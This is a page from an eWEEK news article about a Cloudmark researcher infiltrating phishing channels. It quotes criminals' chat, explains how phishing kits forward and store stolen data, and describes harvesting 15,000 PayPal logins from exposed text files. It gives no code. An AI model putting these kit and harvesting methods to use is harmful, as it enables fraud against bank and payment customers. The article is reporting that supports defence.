Going Undercover in the Slimy World of Phishing - Page 2

Slimy World of Phishing">

Cloudmark published a whitepaper on the undercover work in which the company quoted this sample discussion from a phishing channel:

14:29 < Droper> cashout any us bank like Wachovia,Wells,Chase,Citibank,Boa,Wamu amd all uk banks and some Canada Banks also Pick WU and MG and drops for merchandise and drop for Billpay msg me for deal
14:31 < jiciuvyu> i have e-gold,root,paypal,poste.it,php mailer,php sender inbox,scam pages,ebay extractor,mail extractor,bank logins,and need wells drop prv me

The user with the handle "Droper" is a casher advertising the banks he or she can extract currency from. The other user, "jiciuvyu," is advertising phishing tools and information available and also is requesting a "wells drop," meaning a Wells Fargo bank account to transfer—or to "drop"—money into.


Read more here about a phisher who was convicted of defrauding AOL customers.

After talking the talk for a few weeks, Harbert convinced users to send tools and phishing kits. He found within the kits HTML files, PHP files and a variety of Web files.

Would-be phishers unzip a kit and run it. When deployed on a server, the kit creates an automatic phishing attack. The phisher inserts his or her e-mail address into the configuration file so that when a victim falls for the attack, his or her information is automatically forwarded to the phisher.

What surprised Harbert, he said, was to find that the variety of kits all shared a common set of back-end files—what he calls the "brain files," with the same names.

Phishing monitoring companies are seeing an explosion of these kits—not surprising, given that theyre "simple, easy and cheap" to run, Harbert said.

Looking deeper, he discovered that novice phishers are actually being scammed by advanced phishers. Those advanced phishers are writing and selling kits that include secret, obfuscated code that e-mails stolen information not only back to the primary phisher but to the original phisher who sold him or her the kit.

Harbert also discovered what he says is a new phishing variant: the storage of stolen information in flat text files. Besides e-mailing the information to phishers, the kits are also writing all data to text files in the directory of a given attack. Harbert found that those text files have common names. Those names are actually viewable on sites that report real-time phishing attacks, as does Cloudmark.

After writing a script to automatically retrieve the text files from such sites, Harbert was able to find PayPal account numbers from plain flat text files—in other words, PayPal accounts in plain, unencrypted text. He thus obtained 15,000 PayPal accounts, including user names and passwords, using no phishing techniques whatsoever—just a simple automated search on publicly available feeds.

Harbert also discovered a new trend within the community: unique attacks for every victim. Kits that create unique scam URLs for each target are a highly desirable thing for phishers, given that they render the shutdown of a particular attack irrelevant.

Another role in the community is that of the rip-off artist who steals from the phishers. Called a "ripper," such an individual promises to cash out a compromised account but instead just takes off with the money.

Armed with such terms, Harbert said it was easy to infiltrate the community. "Just go in and talk the talk, say youre interested, that you want to make a lot of money, that you want to help them with attacks," he said. "I pretended to be a spammer. … A lot of phishers sent a kit, and I didnt do the work, and they were really kind of heartbroken. One guy told me I really hurt his feelings."

Lisa Vaas can be contacted at lisa_vaas@ziffdavisenterprise.com.

Check out eWEEK.coms Security Center for the latest security news, reviews and analysis. And for insights on security coverage around the Web, take a look at eWEEKs Security Watch blog.